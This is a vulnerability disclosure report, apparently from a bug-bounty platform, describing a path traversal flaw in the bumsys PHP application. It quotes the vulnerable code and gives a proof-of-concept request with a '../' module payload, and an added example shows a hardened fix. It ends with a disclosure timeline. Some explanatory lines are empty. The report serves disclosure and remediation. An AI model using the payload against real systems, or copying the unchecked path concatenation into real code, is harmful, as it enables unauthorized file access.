Path Traversal in code in unilogies/bumsys


Reported on Mar 8th 2023


The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.

Proof of Concept

Code that has the vulnerability:

if(isset($_GET['module'])) {
    // Build the page location (user input is concatenated directly into the path)
    $ajaxModulePage = DIR_MODULE . $_GET['module'] . "/ajax.php";

    // Check if the ajax page exists
    if(file_exists($ajaxModulePage)) {
        // Load the ajax module page
        require $ajaxModulePage;

        // If iCheck is needed then include it.
        if(isset($_GET["icheck"]) and $_GET["icheck"] === "true") {
            echo "<script> $('input[type=\"checkbox\"].square').iCheck({ checkboxClass: 'icheckbox_square-blue', }) </script>";
        }
        // If tooltip is needed then include it.
        if(isset($_GET["tooltip"]) and $_GET["tooltip"] === "true") {
            echo "<script> $(document).ready(function() { $('[data-toggle=\"tooltip\"]').tooltip(); }); </script>";
        }
        // If select2 is needed then include it.
        if(isset($_GET["select2"]) and $_GET["select2"] === "true") {
            echo "<script> $(document).ready(function() { $('.select2').select2(); }); </script>";
        }

    } else {

        echo "<div class='alert alert-danger'>Invalid module url. Please check the form action.</div>";

    }
}




POST /xhr/?module=peoples/../my-shop&page=posSaleList HTTP/1.1
Cookie: eid=1; __9f5aaf9a1c723f88a93114980386cd57d852e02a=tuuv72f7ij41fn128ha9u1vjs4; currencySymbol=%E0%A7%B3; keepAlive=1; __2a394d7098ce5a777abe5dc58243b7f5e3fca7ac=tvakqcbhioa0cuotreneas9ad0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Csrf-Token: 36e268f96394f73e89350d434bf6e1123ea3b07f
X-Requested-With: XMLHttpRequest
Content-Length: 0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Through this vulnerability, it is possible to change the path.


Full Path:


Should open page "peoples", but if we type


Edited Path:


Result path:


It will go up one directory and open "my-shop".


This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.
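As an added example (not code from bumsys), the report's concatenation is shown beside a hardened lookup that allow-lists the module name and checks the canonical path stays under the module root; the temporary module tree, the DIR_MODULE stand-in and the helper names are assumptions for illustration:

```php
<?php
// Added example, not bumsys code. Builds a throwaway modules tree so the
// check is runnable, then compares the report's concatenation with a
// hardened lookup. DIR_MODULE here is an assumed stand-in for the app's.
$root = sys_get_temp_dir() . '/bumsys-demo-' . getmypid();
foreach (['peoples', 'my-shop'] as $d) {
    mkdir("$root/modules/$d", 0700, true);
    file_put_contents("$root/modules/$d/ajax.php", "<?php // $d module\n");
}
define('DIR_MODULE', "$root/modules/");

// Vulnerable: the raw query value is spliced into the path, so
// "peoples/../my-shop" lands in a different module directory.
function vulnerableModulePath(string $module): string
{
    return DIR_MODULE . $module . '/ajax.php';
}

// Hardened: one path segment of safe characters, then a canonical
// containment check so nothing outside DIR_MODULE can be required.
function safeModulePath(string $module): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $module)) {
        return null;                       // rejects '/', '.', '%', NUL
    }
    $base = realpath(DIR_MODULE);
    $real = realpath(DIR_MODULE . $module . '/ajax.php');
    if ($base === false || $real === false) {
        return null;                       // unknown module
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside the root
    }
    return $real;
}

// Constructed inputs: the legitimate module, the report's payload, a typo.
foreach (['peoples', 'peoples/../my-shop', 'nonexistent'] as $m) {
    printf("%-22s vulnerable -> %s\n%-22s hardened   -> %s\n", $m,
        vulnerableModulePath($m), '', safeModulePath($m) ?? 'rejected');
}
```

The regex alone stops the reported payload; the realpath containment check is defence in depth for encodings or symlinks the allow-list did not anticipate.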


We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 3 months ago
2 months ago


Any update from you guys

Khurshid Alam validated this vulnerability a month ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a month ago


Could you give CVE please?

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
index.php#L17 has been validated